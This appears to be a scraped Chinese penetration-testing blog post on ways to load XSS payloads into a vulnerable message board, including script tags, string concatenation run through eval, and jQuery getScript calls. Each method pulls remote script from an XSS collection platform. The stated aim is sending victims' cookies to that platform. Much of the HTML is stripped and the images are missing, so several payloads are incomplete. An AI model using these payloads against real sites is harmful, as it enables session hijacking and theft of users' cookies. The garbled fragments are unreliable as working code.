我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!
文章目录
-
- 一、xss漏洞测试-加载payload的方法
-
- 1、背景
- 2、xss平台通用payload加载
- 3、img 创建script标签加载
- 4、字符并接加载
- 5、jquery加载
一、xss漏洞测试-加载payload的方法 1、背景
(1)当我们在测试xss漏洞的时候,一般都是用h1、script等简单的html标签 进行测试样式是否改变或是否弹窗,来检验是否存在xss漏洞。
(2)当在利用这个xss漏洞获取信息的时候就要加载payload,加载payload的方法多种多样,以下是常用的加载技巧。
2、xss平台通用payload加载
(1)有一些 xss平台已经有一些通用的方法。直接拿到用就可以了。
文章图片
文章图片
(2)标准script加载到留言板
payload-1:
=http://www.xssplatform.com/7Kar>payload-2:
=//www.xssplatform.com/7Kar>
文章图片
(3)反弹cookie信息到xssplatform平台
文章图片
3、img 创建script标签加载
(1)payload:不适用于存储型
文章图片
(3)反弹cookie信息到xssplatform平台
文章图片
4、字符并接加载
(1)这种一般是输入的字符有限制的时候使用
>z='document.'
>z=z+'write("'
>z=z+'
>z=z+' src=https://www.it610.com/article/ht'
>z=z+'tp://www.'
>z=z+'xssplatform'
>z=z+'.com/7'
>z=z+'Kar>
>z=z+'ript>")'
>eval(z)
(2)加载payload到留言板
文章图片
(3)上面的留言板没有生效,我们可以直接把该payload放到本地服务器下的demo2.html内进行测试
文章图片
文章图片
5、jquery加载
(1)加载公有js库,然后利用jquery语法创建一个script标签
="http://code.jquery.com/jquery-1.9.1.min.js">
>$.getScript("//www.xssplatform.com/7Kar");
【#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]】(2)加载payload到留言板
文章图片
(3)反弹cookie信息到xssplatform平台
文章图片
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- #|VUE_数据修改后调用 this.$nextTick
- Leetcode|21. 合并两个有序链表
- #|时序预测 | MATLAB实现时间序列回归之似然检验
- #|时序预测 | MATLAB实现时间序列回归之测试检验
- #|时序预测 | MATLAB实现时间序列回归之Bootstrapped测试
- 自动化测试|【Appium实战】如何使用mumu模拟器模拟安卓手机
- #|Widerface数据集 | widerface数据集转成YOLO格式
- #|vue-cli3.0 使用postcss-plugin-px2rem(推荐)和 postcss-pxtorem(postcss-px2rem)自动转换px为rem 的配置方法
- 数据结构与算法|位运算各种方法总结